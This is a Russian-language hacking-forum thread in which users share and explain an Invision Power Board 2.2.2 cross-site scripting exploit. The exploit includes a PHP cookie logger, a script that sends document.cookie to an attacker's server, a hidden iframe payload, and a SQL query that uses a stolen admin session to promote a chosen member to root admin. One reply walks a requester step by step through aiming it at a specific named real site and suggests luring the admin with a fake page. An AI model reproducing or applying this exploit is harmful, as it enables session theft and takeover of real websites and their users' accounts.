Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
24.08.2007, 21:42
|
|
Banned
Регистрация: 21.06.2007
Сообщений: 87
Провел на форуме:
543344
Репутация:
43
|
|
Ipb 2.2.2
PHP код:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Invision Power Board 2.2.2 Cross Site Scripting vulnerability
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Vendor site: http://www.invisionboard.com/
# Vulnerability found by Iron (ironwarez.info)
#
# Greets to all **** Security Group members
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# The vulnerability:
# Open up any php file in /jscripts/folder_rte_files
# See:
var editor_id = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?>
#
# $_REQUEST['editorid'] isn't sanitized in any way, so allows
# other uses to execute their own code.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# PoC (Log cookies & run SQL query)
#
# Requirements: server supporting PHP, user account on
# target forum, database prefix needs to be known.
#
# Create a file called name.php on your webserver and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
<?php
$target = "http://www.l2.rednet.su/forum"; #Target forum without trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root admin
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET['c'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";
$file = fopen('log.txt' , 'a');
fwrite($file,$text);
fclose($file);
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print '<img width=0 height=0 src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql§ion=admin&query=UPDATE+
'.$prefix.'members+SET
+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'. $member.'%27&st="></>';
}
?>
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Also create a file in the same directory named "log.txt" and chmod it 777
#
# Now, create a file called script.js on your webserver, put this code in it:
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
document.location="http://www.yourownsite.com/path/to/file/name.php?c="+document.cookie;
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# And, last but not least, create a file that combines those two;)
# Name it blah.html and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
<iframe border=0 src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></
script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>
нашел скрипт на ачате....спс автору...но есть вопрос....запустить я научился....но вот пользоваться нет,никак не могу понять что куда вписать....нужен такой же скрипт для сайта http://l2.rednet.su/news.php ....пожалуйста,помогите!! |
|
|
24.08.2007, 22:31
|
|
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935
Репутация:
64
|
|
В скрипте где-то ошибка и он не работает, я спрашивал за этот сплойт - толком путевого ответа не получил
|
|
|
|
24.08.2007, 22:45
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сплойт пашет при наличии админской сессии...
|
|
|
|
24.08.2007, 23:16
|
|
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935
Репутация:
64
|
|
Сплойт пашет при наличии админской сессии...
Выложи его в рабочем состоянии
Я на локалхосте проверял
adminindex.php?adsess='.$stuff[1].'&act=sql&code=runsql§ion=admin&query=UPDATE + '.$prefix.'members+SET+mgroup+%3D+%27'.$newgroup.' %27+WHERE+id+%3D+%27'.$member.'%27&st=
Эта строчка пашет
а все вместе - нет
|
|
|
|
24.08.2007, 23:21
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
сначала создашь файл name.php у себя на хосте
PHP код:
<?php
$target = "http://www.l2.rednet.su/forum"; #Target forum without trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root admin
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET['c'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";
$file = fopen('log.txt' , 'a');
fwrite($file,$text);
fclose($file);
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print '<img width=0 height=0 src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql§ion=admin&query=UPDATE+
'.$prefix.'members+SET
+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'. $member.'%27&st="></>';
}
?>
2) Далее делаешь файл в той же папке log.txt и ставишь атрибуты 777
3) Делаешь файл script.js на своем хосте:
Код:
document.location="http://www.yourownsite.com/path/to/file/name.php?c="+document.cookie;
4)Создаешь файл blah.html, такого содержания:
Код:
<iframe border=0 src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></
script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>
5)Отсылаешь админу или кому угодно ссылку на blah.html, если попадеться админ,который только что из админки, то юзер id которого ты указал попадет в группу админов, а если просто юзер, то его печеньки будут записаны в log.txt
З,Ы, В blah.html засунь какуй-нить инфу кроме ифреймов, что типо без палева ( как вариант делаешь фейк страницу, какого нить ла2 сервера ( я так понял ты его ломаешь) и отсылаешь, типо обмен банерами) и ГЛАВНОЕ не забудь поставить все пути в коде
2Nightmare
Там сессия нужна только что бы повысить юзера до админа |
|
|
|
25.08.2007, 00:03
|
|
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935
Репутация:
64
|
|
Кто-нибудь наконец исправит ошибку в сплойте или уже 3-я подобная тема пройдет
Пробелы - не в счет
|
|
|
|
25.08.2007, 00:27
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
может у тебя просто префикс другой ?
|
|
|
|
25.08.2007, 00:45
|
|
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935
Репутация:
64
|
|
Нет, префикс правильный, на локал хосте пробовал, форум уязвим
|
|
|
|
26.08.2007, 11:46
|
|
Banned
Регистрация: 21.06.2007
Сообщений: 87
Провел на форуме:
543344
Репутация:
43
|
|
To maxster]
слушай...а в самом скрипте изменить ниче не надо?
|
|
|
|
01.09.2007, 12:04
|
|
Banned
Регистрация: 21.06.2007
Сообщений: 87
Провел на форуме:
543344
Репутация:
43
|
|
Сообщение от FaR-G9
Настраивать надо
а как???для форума http://l2.rednet.su/forum/index.php
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для ch[@]ch](/avatars/avatar37993.gif){kind=avatar}
Похожие темы
Линейный вид
